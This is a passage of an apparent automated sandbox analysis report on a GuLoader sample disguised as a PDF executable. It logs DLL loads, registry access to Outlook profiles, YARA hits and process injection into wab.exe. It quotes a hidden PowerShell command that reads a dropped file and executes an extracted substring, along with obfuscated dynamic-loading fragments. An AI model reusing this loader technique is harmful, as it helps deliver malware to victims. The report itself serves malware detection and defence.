              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
              Source: BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: em.Core.pdb" source: powershell.exe, 00000002.00000002.1610988819.0000000008A30000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: tion.pdb source: powershell.exe, 00000002.00000002.1602041753.0000000003618000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: s\System.Core.pdb source: powershell.exe, 00000002.00000002.1610988819.0000000008A30000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wab.pdbGCTL source: wab.exe, 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp
              Source: Binary string: wab.pdb source: wab.exe, wab.exe, 0000000E.00000002.2440184985.0000000000E01000.00000020.00000001.01000000.0000000B.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 7572, type: MEMORYSTR
              Source: Yara matchFile source: 00000002.00000002.1611756970.0000000009A72000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000E.00000002.2440927525.00000000030F2000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Signman $Plinther $Kerykeion), (Soulmusiks @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Foothook = [AppDomain]::CurrentDomain.GetAssemblies()$global:Bog
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Flavescence45)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Adjutator, $false).DefineType($Arbejdede, $
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$unterraced=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete204.Myc';$Lagerekspedient=$unterraced.SubString(66375,3);.$Lagerekspedient($unterraced)"
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$unterraced=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Pissoirers\Spirochete204.Myc';$Lagerekspedient=$unterraced.SubString(66375,3);.$Lagerekspedient($unterraced)"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07C68550 push dword ptr [ecx+eax*2-75h]; iretd 2_2_07C689FF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07C6A0E8 pushfd ; ret 2_2_07C6A23E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07C67F1A push 8B064C24h; iretd 2_2_07C67F1F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07C6AD5D pushfd ; ret 2_2_07C6AD5E
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07C6A893 pushfd ; ret 2_2_07C6A8AE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_07C6A8B0 pushfd ; ret 2_2_07C6ACDE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08CB4DB5 push esp; retf 2_2_08CB4DB9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00E0376D push ecx; ret 14_2_00E03780
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00E013F8 pushfd ; retf 14_2_00E013F9
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\twinsomeness\Pissoirers\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeJump to dropped file
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\BPN__S-I03810366200624-820240628503036_202407010849535435_20240702135021#U00b7pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
